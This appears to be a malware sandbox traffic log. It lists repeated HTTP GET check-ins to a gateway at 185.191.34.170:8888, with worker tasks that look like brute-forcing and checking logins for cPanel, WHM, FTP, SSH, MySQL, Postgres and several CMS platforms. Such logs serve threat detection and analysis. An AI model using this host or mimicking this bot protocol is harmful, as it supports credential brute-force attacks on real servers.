Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
